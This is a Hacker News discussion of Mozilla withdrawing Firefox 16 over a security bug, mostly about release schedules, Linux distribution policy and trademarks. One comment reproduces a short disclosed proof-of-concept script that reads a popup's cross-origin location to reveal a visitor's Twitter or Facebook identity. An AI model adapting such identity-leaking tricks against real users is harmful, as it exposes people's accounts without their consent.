

Mozilla pulls day-old Firefox 16 from download site over security risk - molecule
http://arstechnica.com/security/2012/10/mozilla-pulls-day-old-firefox-16-from-download-site-over-security-risk/

======
pittsburgh
If you're curious like I was, you can find the details of the vulnerability
described by Gareth Heyes at [http://www.thespanner.co.uk/2012/10/10/firefox-
knows-what-yo...](http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-
your-friends-did-last-summer/)

His proof-of-concept of the vulnerability can be found at
[http://www.businessinfo.co.uk/labs/firefox_knows_what_your_f...](http://www.businessinfo.co.uk/labs/firefox_knows_what_your_friends_did_last_summer/poc.html)
(Best fetched via curl... or Firefox 16.0 with an active Twitter session if
you're daring.)

Or you can just see the source here:

    
    
      <!doctype html>
      <script>
      function poc() {
        var win = window.open('https://twitter.com/lists/',
          'newWin', 'width=200,height=200');
        setTimeout(function(){
          alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
        }, 5000);
      }
      </script>
      <input type=button value="Firefox knows" onclick="poc()">
    

edit: As others discovered, the regex stuff is an unnecessary red herring.
Here's a simplified POC that uses Facebook to discover your vanity URL:

    
    
      <!doctype html>
      <script>
      function poc() {
        var win = window.open('https://facebook.com/profile.php',
          'newWin', 'width=200,height=200');
        setTimeout(function(){
          alert('Hello ' + win.location);
        }, 5000);
      }
      </script>
      <input type=button value="Firefox knows" onclick="poc()">

~~~
gcp
Given that this bug was likely there for at least 12 weeks in Beta and Aurora
releases, it sort-of makes you question if the release schedule couldn't be
even faster by skipping one of these or at least try to encourage _much_ more
people (certainly the ones who can pull off the above) to try Betas. Having 18
weeks of lead-time for a release clearly doesn't do much good when nobody
tries it beforehand.

There were chemspills for Firefox 13, 14, 15 and now 16. None of those seemed
to be caused by the rapid development schedule, they were (IIRC) all issues
discovered because the release had much wider exposure compared to beta.

On the other hand, Firefox now does silent updates, so if there hadn't been so
much publicity about the Firefox release (or on the update being blocked), it
might have been a non-event. In a few hours everyone will be on 16.0.1. I'm
not sure if this would have happend to a non-open-source project, if we'd even
hear about it.

Maybe we can make it clearer that "Beta" is really Mozillian for "Release
Candidate"?

~~~
dfc
Chemspills?

~~~
cpeterso
A "chemspill" is Mozilla-speak for a x.0.1 dot release to fix a critical bug,
such as a security bug or a serious crash.

------
machrider
<sarcasm>Thanks Ubuntu for sending this update so quickly!</sarcasm>

I never really thought of Ubuntu as a bleeding-edge distribution, but it seems
more and more like one lately. It used to be the distro that "just works".
Now, I find myself dealing with more and more bugs as the years go. Debian
stable is probably too conservative for a workstation - is there a happy
medium distro out there?

~~~
sciurus
Ubuntu has decided to closely track Firefox releases because Mozilla doesn't
provide security updates for older Firefox versions. I'm not sure what other
software receives major version updates within the lifetime of an Ubuntu
release (Chromium?), but it's not the norm.

Debian hasn't adapted this policy yet; they still declare a version of Firefox
stable and backport patches to it. They've had to switch the name and logos
from Firefox to Iceweasel because Mozilla does not allow anyone to
independently provide updates and still use the Firefox trademark.

[https://wiki.ubuntu.com/DesktopTeam/Specs/Lucid/FirefoxNewSu...](https://wiki.ubuntu.com/DesktopTeam/Specs/Lucid/FirefoxNewSupportModel)

<http://wiki.debian.org/Iceweasel>

~~~
cookiecaper
Which makes sense. If you change Firefox, it's no longer the real Firefox,
it's a derivative work. Allowing derivative works to use your trademark
without careful review and blessing is surely dangerous and misrepresentative.

~~~
sciurus
This is going off on a tangent, but in comparison to other free software
projects Mozilla is unusually strict about trademarks.

LibreOffice, for instance, has a policy that says You can use their trademark
if you are 'substantially unmodified', which means "built from the source code
provided by TDF, possibly with minor modifications including but not limited
to: the enabling or disabling of certain features by default, translations
into other languages, changes required for compatibility with a particular
operating system distribution, the inclusion of bug-fix patches, or the
bundling of additional fonts, templates, artwork and extensions)."

Mike Connor from Mozilla has said that to use the Mozilla trademarks, you have
to get prior approval from them for your build configuration and every patch
you introduce.

[http://bugs.debian.org/cgi-
bin/bugreport.cgi?msg=74;bug=3546...](http://bugs.debian.org/cgi-
bin/bugreport.cgi?msg=74;bug=354622)

~~~
gcp
Does The Document Foundation receive any income from their distribution of
LibreOffice?

------
jaipilot747
Pulling the download links does nothing for users who already installed or
upgraded to FF16. Leaving them vulnerable for the one day it takes Mozilla to
fix this, without them even knowing that they are at risk.

~~~
gcp
Firefox releases go through 18 weeks of testing before release, so everyone on
Beta, Aurora or Nightly has been vulnerable for a long time - the exploit
simply wasn't known yet.

------
fluxon
If FF16 was pulled, why did it _just_ (Thu, Oct 11, 12:05pm PST) download and
try to update my 15.0.1? (WinXP) That made me . . . uncomfortable.

------
bookworm_
Firefox is a monster. Too big. I switched to Webkit and midori (but there are
certainly other small, simple WebKit-based alternatives).

So no to Gecko.

~~~
gcp
Yes, because Webkit never had security issues, and those alternate browsers
have faster patching processes than Mozilla or Google do.

I don't think so.

------
jebblue
If Firefox hadn't gone on a version roller coasters ride I'd still be using
it. At least they pull versions that need more attention. But, FF 16!?!?!
16!!!? Huh? My plugins stopped working long ago and I stopped taking Mozilla
seriously long ago, well not long ago, maybe a couple of years ago when I
switched to Chrome. It's weird I thought Google was a financial supporter of
Mozilla?

~~~
ryannielsen
_If Firefox hadn't gone on a version roller coasters ride I'd still be using
it. At least they pull versions that need more attention. But, FF 16!?!?!
16!!!? Huh?_

. . . you do know Chrome's at version 22 and version 24 is in dev release,
right?

Knock FF for the more disruptive update process, and for breaking plugins in
earlier releases, sure. But (AFAIK) the plugin interfaces have been stable for
quite some time now, and Firefox 15 introduced true silent updates. They seem
to have fixed the pain points in their rapid release schedule.

If you use Chrome, however, you _cannot_ knock them for iterating more
quickly; Chrome's in the same boat.

~~~
jebblue
>> If you use Chrome, however, you cannot knock them for iterating more
quickly; Chrome's in the same boat.

My Chrome plugins don't break. They can change the version every day for all I
care just don't break my plugins, extensions.

~~~
timdorr
You know they're going to break old extensions in a year, right?
<http://developer.chrome.com/extensions/manifestVersion.html>

~~~
jebblue
Any developer who can't upgrade their extension with that much notice and with
that clear of a specification and I don't want to use their extension any more
if it breaks.

